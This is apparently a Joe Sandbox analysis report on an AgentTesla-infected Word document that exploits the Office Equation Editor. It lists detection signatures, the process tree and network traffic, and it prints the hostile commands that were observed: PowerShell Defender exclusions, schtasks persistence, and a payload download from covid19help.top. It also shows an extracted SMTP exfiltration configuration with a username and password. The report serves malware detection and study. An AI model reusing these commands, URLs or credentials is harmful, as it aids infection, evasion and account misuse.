Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Scan 368 1.doc

Overview

General Information

Sample name:Scan 368 1.doc
Analysis ID:1427899
MD5:f22c33e0af52d382e821ff26fe23f30b
SHA1:15bdcdd580cbb66c67d8fd90151e25fc285f7de3
SHA256:50297c7705e690b43057219bc9a89cfb49e6d739742bbf4d904b64832b1cfefc
Tags:doc
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2736 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 2152 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • obimohohj75.scr (PID: 3128 cmdline: "C:\Users\user\AppData\Roaming\obimohohj75.scr" MD5: A1B496997BE52302CB008BB93FABCFBF)
        • powershell.exe (PID: 3212 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • powershell.exe (PID: 3248 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • schtasks.exe (PID: 3292 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
        • obimohohj75.scr (PID: 3512 cmdline: "C:\Users\user\AppData\Roaming\obimohohj75.scr" MD5: A1B496997BE52302CB008BB93FABCFBF)
    • EQNEDT32.EXE (PID: 3140 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • taskeng.exe (PID: 3452 cmdline: taskeng.exe {028588F3-95E8-48BE-8F64-19174D00F448} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • pgZzUFYKXcIRkU.exe (PID: 3492 cmdline: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe MD5: A1B496997BE52302CB008BB93FABCFBF)
      • powershell.exe (PID: 3612 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • powershell.exe (PID: 3692 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
      • schtasks.exe (PID: 3792 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp8CF4.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • pgZzUFYKXcIRkU.exe (PID: 3916 cmdline: "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe" MD5: A1B496997BE52302CB008BB93FABCFBF)
      • pgZzUFYKXcIRkU.exe (PID: 3964 cmdline: "C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe" MD5: A1B496997BE52302CB008BB93FABCFBF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.gmail.com", "Username": "micromeqbd@gmail.com", "Password": "tssveohxktcpzhdm"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Scan 368 1.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1afd1:$obj2: \objdata
  • 0x1afeb:$obj3: \objupdate
  • 0x1afae:$obj4: \objemb

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000016.00000002.627290510.00000000022A2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    0000000E.00000002.625847603.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000E.00000002.625847603.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000E.00000002.626533099.0000000002600000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000005.00000002.371692371.00000000035E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.2.obimohohj75.scr.35e1930.5.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              5.2.obimohohj75.scr.35e1930.5.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                5.2.obimohohj75.scr.35e1930.5.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x31671:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x316e3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x3176d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x317ff:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x31869:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x318db:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x31971:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x31a01:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                5.2.obimohohj75.scr.361c350.6.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  5.2.obimohohj75.scr.361c350.6.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 10 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Equation Editor Network Connection
                    Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 172.67.175.222, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2152, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\obimohohj75.scr", ParentImage: C:\Users\user\AppData\Roaming\obimohohj75.scr, ParentProcessId: 3128, ParentProcessName: obimohohj75.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr", ProcessId: 3212, ProcessName: powershell.exe
                    Sigma detected: Suspicious Microsoft Office Child Process
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\obimohohj75.scr", CommandLine: "C:\Users\user\AppData\Roaming\obimohohj75.scr", CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\obimohohj75.scr, NewProcessName: C:\Users\user\AppData\Roaming\obimohohj75.scr, OriginalFileName: C:\Users\user\AppData\Roaming\obimohohj75.scr, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2152, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\obimohohj75.scr", ProcessId: 3128, ProcessName: obimohohj75.scr
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\obimohohj75.scr", ParentImage: C:\Users\user\AppData\Roaming\obimohohj75.scr, ParentProcessId: 3128, ParentProcessName: obimohohj75.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr", ProcessId: 3212, ProcessName: powershell.exe
                    Sigma detected: SCR File Write Event
                    Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2152, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xobizx[1].scr
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\obimohohj75.scr", ParentImage: C:\Users\user\AppData\Roaming\obimohohj75.scr, ParentProcessId: 3128, ParentProcessName: obimohohj75.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp", ProcessId: 3292, ProcessName: schtasks.exe
                    Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
                    Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke: Data: Image: C:\Users\user\AppData\Roaming\obimohohj75.scr, QueryName: api.ipify.org
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\obimohohj75.scr", ParentImage: C:\Users\user\AppData\Roaming\obimohohj75.scr, ParentProcessId: 3128, ParentProcessName: obimohohj75.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp", ProcessId: 3292, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Screensaver Binary File Creation
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2152, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xobizx[1].scr
                    Sigma detected: Modification of IE Registry Settings
                    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2152, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\obimohohj75.scr", ParentImage: C:\Users\user\AppData\Roaming\obimohohj75.scr, ParentProcessId: 3128, ParentProcessName: obimohohj75.scr, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obimohohj75.scr", ProcessId: 3212, ProcessName: powershell.exe
                    Sigma detected: Office Macro File Creation
                    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2736, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                    Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3212, TargetFilename: C:\Users\user\AppData\Local\Temp\5nap3g1o.oc0.ps1

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\obimohohj75.scr", ParentImage: C:\Users\user\AppData\Roaming\obimohohj75.scr, ParentProcessId: 3128, ParentProcessName: obimohohj75.scr, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp", ProcessId: 3292, ProcessName: schtasks.exe

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 5.2.obimohohj75.scr.35e1930.5.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.gmail.com", "Username": "micromeqbd@gmail.com", "Password": "tssveohxktcpzhdm"}
                    Multi AV Scanner detection for domain / URL
                    Source: covid19help.topVirustotal: Detection: 24%Perma Link
                    Source: https://covid19help.top/xobizx.scrVirustotal: Detection: 23%Perma Link
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xobizx[1].scrReversingLabs: Detection: 26%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xobizx[1].scrVirustotal: Detection: 47%Perma Link
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrReversingLabs: Detection: 26%
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrVirustotal: Detection: 47%Perma Link
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeReversingLabs: Detection: 26%
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeVirustotal: Detection: 47%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: Scan 368 1.docVirustotal: Detection: 47%Perma Link
                    Source: Scan 368 1.docReversingLabs: Detection: 47%
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xobizx[1].scrJoe Sandbox ML: detected

                    Exploits

                    barindex
                    Office equation editor establishes network connection
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 172.67.175.222 Port: 443Jump to behavior
                    Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obimohohj75.scr
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obimohohj75.scrJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: unknownHTTPS traffic detected: 172.67.175.222:443 -> 192.168.2.22:49163 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.22:49164 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.22:49165 version: TLS 1.2

                    Software Vulnerabilities

                    barindex
                    Document exploit detected (process start blacklist hit)
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrCode function: 4x nop then jmp 00710C95h5_2_0071064B
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exeCode function: 4x nop then jmp 008D0C95h13_2_008D064B
                    Source: global trafficDNS query: name: covid19help.top
                    Source: global trafficDNS query: name: api.ipify.org
                    Source: global trafficDNS query: name: api.ipify.org
                    Source: global trafficDNS query: name: api.ipify.org
                    Source: global trafficDNS query: name: api.ipify.org
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 104.26.12.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.26.13.205:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 172.67.175.222:443
